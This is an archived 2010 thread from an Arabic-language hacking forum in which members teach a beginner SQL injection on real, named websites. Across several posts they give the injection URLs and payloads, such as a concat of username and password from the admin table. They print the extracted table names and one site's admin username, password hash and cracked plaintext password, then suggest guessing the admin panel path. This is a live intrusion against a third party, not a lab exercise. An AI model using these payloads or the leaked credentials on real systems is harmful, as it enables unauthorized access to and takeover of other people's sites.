:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   لإخوة المتمكنين من الحقن (http://www.vbspiders.com/vb/showthread.php?t=35410)

MadaRaXP 08-23-2010 06:07 AM
لإخوة المتمكنين من الحقن
 
السلام عليكم ورحمة الله وبركاته
ممكن من الإخوة المتمكنين من الحقن ان يعلمني

لقد حملت العديد من الدورات لكن لا شيء لو يتكرم و يعلمني او يعلم مجموعة منا

Mr-MoncéFiix 08-23-2010 06:15 AM
في الحقيقة العديد من الدين يخترقـون بتغرة حقن القواعد تعلمو من هنـــا
http://www.vbspiders.com/vb/f236.html
هده الددورة راائـعـة تعلم منهـا و سوف تتعلم انشـاء الله
و أي استفسار في الدورة هــنــا
http://www.vbspiders.com/vb/f236.html

MadaRaXP 08-23-2010 06:39 AM
plz add me sqh@live.fr

ممكن موقع لتطبيق

NeTCaT-Ma 08-23-2010 06:56 AM
تفضل
http://www.beautycall.co.uk/gallery.php?id=1

NeTCaT-Ma 08-23-2010 06:57 AM
http://www.findmespot.com/en/index.php?cid=102

KaLa$nikoV 08-23-2010 11:00 AM
الشباب ما قصرو

نتمنا نشوفك مخترق

ارساوي 08-23-2010 11:47 AM
يلا ها

عطوك مواقع

وعطوك دورة

شو احلى من هيك

واي استفسار اطرحه

MadaRaXP 08-23-2010 04:59 PM
و الله قاموا بلازم ان شاء الله اتباع الدورة و اطبق على الموقع بشكل موازي و اي استفسار اضعه هنا ،،،
بوركتم

MadaRaXP 08-23-2010 05:31 PM
السلام عليكم انا توقفت هنا لم اعرف ماذا افعل بعد ،،،
http://www.beautycall.co.uk/gallery....ersion%28%29--

Tn-Sn!PeR 08-23-2010 06:09 PM
بداية طيبة أخي

الخطوة التالية للإصدار الخامس وهي لمعرفة إسم الجدول و عمود الباس و الجدول المخطط
http://www.beautycall.co.uk/gallery....15, 115, 37)--

MadaRaXP 08-23-2010 06:18 PM
تفضل اخي طبقت الأمر بحت عن جدول اليوزر و الباس عبر امر where like
و وجدت التالي
phpbb_bbcodes:first_pass_match:beautycall_co_uk_fo rum

ما رأيك

Tn-Sn!PeR 08-23-2010 06:26 PM
أخي هذا ليس الجدول أين يوجد اليوزر و الباس

عند دخولك لهذا الرابط

ستجد تلك الأعمدة أعمل copier coller في النوت باد

ستجد من بين تلك الجداول هذا الجدول
admin:password:beautycall_co_uk_web

هذا هو الجدول المطلوب

MadaRaXP 08-23-2010 06:27 PM
ممكن مساعدة لم اعرف ماذا اختار ’؟

MadaRaXP 08-23-2010 06:30 PM
بوركت كنت شاك فيه
الخطأ الذي عملته هو كان في الأمر group_concat

الخطوة القادمة هي ان اشفر اسم admin و اضع الأمر where+table_name+like=0x61646d696e

MadaRaXP 08-23-2010 06:32 PM
بدون like
http://www.beautycall.co.uk/gallery....0x61646d696e--

اعطاني النتائج التالية

admin:id:beautycall_co_uk_web,admin:username:beaut ycall_co_uk_web,admin:password:beautycall_co_uk_we b,admin:email:beautycall_co_uk_web

Tn-Sn!PeR 08-23-2010 06:43 PM
admin:id:beautycall_co_uk_web
هذا لسنا بحاجة إليه

admin:username:beaut ycall_co_uk_web
هذا مسار عمود اليوزر
admin:password:beautycall_co_uk_we b
هذا مسار الباس
admin:email:beautycall_co_uk_web
و هذا مسار اللإميل إن أردت

Tn-Sn!PeR 08-23-2010 06:46 PM
بعد معرفة عمود اليوزر (username) و عمود الباس (password) و الجدول (admin)

نكتب كالتالي
concat(username,0x3a,password)+from+admin--

Tn-Sn!PeR 08-23-2010 06:53 PM
ممتااااااااااااااااز طلع لينا إسم الأدمين إلّي هو beautycall2010

و الباسورد مشفر d68553e40237bde1465a1da5b199c072

طيب كيف سنفك تشفير الباس؟

نذهب إلى الموقع التالي http://md5cracker.org/
ضع الباس المشفر و لا تنسى حذف الفراغ إن وجد في الأخير

أنت محظوظ أخي
تم فك تشفير الكلمة

d68553e40237bde1465a1da5b199c072 = 4SweetCandy1

يعني في الآخر نجد هذا

إسم الأدمين : beautycall2010
باسوورد الأدمين : 4SweetCandy1

الأن لم يتبقّ إلاّ البحث عن مسار لوحة التحكم

MadaRaXP 08-23-2010 08:27 PM
بوركت لقد قمت بالكتير اخي الكريم ـ،،
عندما اعود ساحالو فهم المبدأ خطوة خطوة ،،،
اما بخصوص البحث عن لوحة التحكم
هل هناك طريقة محددة للبحث

NeTCaT-Ma 08-23-2010 08:39 PM
أضن أخي أن تخمنها تجرب admin أو login ...... إن كان كلامي خاطئ الملرجو تصحيحه

MadaRaXP 08-23-2010 09:05 PM
نتمنى ان نجد جديد من عند الخبراء


الساعة الآن 04:11 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0